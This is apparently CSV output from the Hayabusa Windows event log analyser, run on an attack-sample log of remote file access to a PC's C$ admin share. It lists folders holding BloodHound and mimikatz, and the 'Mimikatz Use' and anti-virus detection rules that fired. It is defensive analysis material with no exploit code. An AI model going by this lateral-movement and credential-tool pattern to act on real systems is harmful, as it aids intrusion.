Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.589 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
